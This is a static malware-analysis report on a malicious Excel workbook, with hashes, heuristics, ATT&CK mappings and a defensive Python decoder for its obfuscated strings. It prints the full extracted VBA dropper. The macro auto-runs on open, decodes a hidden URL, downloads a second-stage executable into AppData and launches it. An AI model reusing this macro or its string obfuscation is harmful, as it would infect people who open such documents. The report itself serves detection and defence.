Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dc065a0837f8c34d…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 121.3 KB
Created: 2020-08-13 13:37:22 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2020-09-07
MD5: 0d0bdf9cd350eaa235ed42355186a0f0
SHA-1: b9df1651881ac0267345b39c9854108c5489a6b8
SHA-256: dc065a0837f8c34db5ca2bad3dafe777be0c22acb15f957b712b2631adf804cc
Risk score: 116

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is an Excel OOXML workbook whose VBA project carries a Workbook_Open handler in the workbook class module (renamed "SiloKkbook"), so the chain fires as soon as the user enables macros. Workbook_Open calls MLoVnY, which rebuilds two strings at runtime with a small Decrypt routine (StrReverse, then every character code minus one): the name of the file to drop and the download URL, neither of which appears in cleartext in the macro. MLoVnY then uses two Win32 imports declared under random-looking aliases, URLDownloadToFileA from urlmon and ShellExecuteA from shell32.dll, to fetch the second-stage payload into %AppData%\<decoded name> and launch it with the "open" verb. The SE_ENABLE_LURE heuristic and the document body text show a social engineering lure asking the user to enable content, which is the step that triggers Workbook_Open.
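Worked decoding of the obfuscated strings (an added example; this is not code from the analysis platform or from the sample's author, and the helper names and regular expressions are this example's own). The Decrypt routine in the extracted macros.bas is only StrReverse followed by Chr(Asc(x) - 1) per character; its second loop runs over an empty string and is junk. The script below ports that routine to Python, pulls every Decrypt("...") literal out of the macro source copied from this page, resolves the aliased Declare statements to their real library exports, and reports the download-and-execute chain. The Declare, Environ and auto-exec checks work on any extracted VBA source; only the decoder is specific to this sample's one-byte shift.

```python
"""Macro triage helper written for this report (added example, not part of the analysis
platform that produced the page and not the sample's own code). It ports the sample's
Decrypt() routine to Python, decodes every Decrypt("...") literal in the VBA source,
resolves Declare statements to library!export pairs, and flags download-and-execute.
MACRO_SOURCE is copied from the extracted macros.bas on this page; every function and
regex below is the example's own."""

import re

# Lines copied from the extracted macros.bas on this page (only those the triage needs).
MACRO_SOURCE = r'''
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Sub MLoVnY()
eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")
DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()
MLoVnY
End Sub
'''

DECRYPT_CALL = re.compile(r'Decrypt\("([^"]*)"\)')
CONTINUATION = re.compile(r" _\r?\n")  # VBA line continuation: space, underscore, newline
DECLARE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)
AUTO_EXEC = ("Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen", "AutoExec")


def decrypt(enc: str) -> str:
    """Port of the macro's Decrypt(): StrReverse, then Chr(Asc(x) - 1) on each character.
    The VBA original also loops over an empty string afterwards; that loop does nothing."""
    return "".join(chr(ord(ch) - 1) for ch in reversed(enc))


def decode_literals(vba: str) -> list[tuple[str, str]]:
    """Every Decrypt("...") argument in the source, paired with its plaintext."""
    return [(m.group(1), decrypt(m.group(1))) for m in DECRYPT_CALL.finditer(vba)]


def api_imports(vba: str) -> dict[str, tuple[str, str]]:
    """Map each Declare'd VBA name to (library, exported symbol); Alias hides the real name."""
    flat = CONTINUATION.sub(" ", vba)  # join continued lines so one regex sees the whole Declare
    return {m.group(1): (m.group(2), m.group(3) or m.group(1)) for m in DECLARE.finditer(flat)}


def defang(s: str) -> str:
    """Neutralise a URL before it goes into a ticket or chat."""
    return s.replace("http", "hxxp").replace(".", "[.]")


def triage(vba: str) -> dict:
    """Collect the indicators this report's heuristics key on, plus the decoded strings."""
    imports = sorted(f"{lib}!{export}" for lib, export in api_imports(vba).values())
    decoded = [plain for _, plain in decode_literals(vba)]
    return {
        "auto_exec": [n for n in AUTO_EXEC if re.search(rf"\bSub\s+{n}\s*\(", vba)],
        "imports": imports,
        "env_vars": sorted(set(re.findall(r'Environ\$?\("([^"]+)"\)', vba))),
        "decoded_strings": decoded,
        "urls": [s for s in decoded if re.match(r"https?://", s)],
        # URLDownloadToFileA plus ShellExecuteA in one project is the classic dropper pair.
        "download_and_execute": any(i.endswith("!URLDownloadToFileA") for i in imports)
        and any(i.endswith("!ShellExecuteA") for i in imports),
    }


if __name__ == "__main__":
    for enc, plain in decode_literals(MACRO_SOURCE):
        print(f'Decrypt("{enc}") -> {defang(plain)}')
    for key, value in triage(MACRO_SOURCE).items():
        print(f"{key}: {value}")
```

Run with python3. Against the lines from this sample it recovers the dropped filename ccww.exe and an https URL on a .biz.pl host, the hardcoded second-stage location the summary refers to. Treat the decoded host and path as IOCs and keep them defanged in tickets. The encoded literals are themselves a useful detection anchor: the shifted URL survives verbatim in the VBA stream, so a YARA string on it catches this build even if the Declare aliases are regenerated.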

Heuristics (5)

  • VBA project inside OOXML (severity: medium; 3 related findings; OOXML_VBA)
    Document contains a VBA project (VBA macros present)
  • URLDownloadToFile in VBA (severity: critical; OLE_VBA_DOWNLOAD)
    Matched line in script:
    Private Declare Function DDBGe Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
    ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
  • Workbook_Open macro (severity: low; OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()
  • Environ() call (env variable access) (severity: low; OLE_VBA_ENVIRON)
    Matched line in script:
    CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
  • Macro/content-enable lure (severity: medium; SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3144 bytes
SHA-256: d8b1cefd861cc3230d2174625c0bde78387b689b52e4d6f690186cd84af88633
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Sib()

End Sub

Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String

eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")

CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM


BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")

DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()

MLoVnY
End Sub


Function Decrypt(enc)
    Dim x, m_
    Dim AppData, daor As Variant
    enc = StrReverse(enc)
    For m = 1 To Len(enc)
        x = Mid(enc, m, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
    For d = 1 To Len(doar)
    doar = ""
    Next
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 23552 bytes
SHA-256: 0b61d4c2a0163308b2c8cd25c4edc3861c7b948ad7259494474aa206a84ad394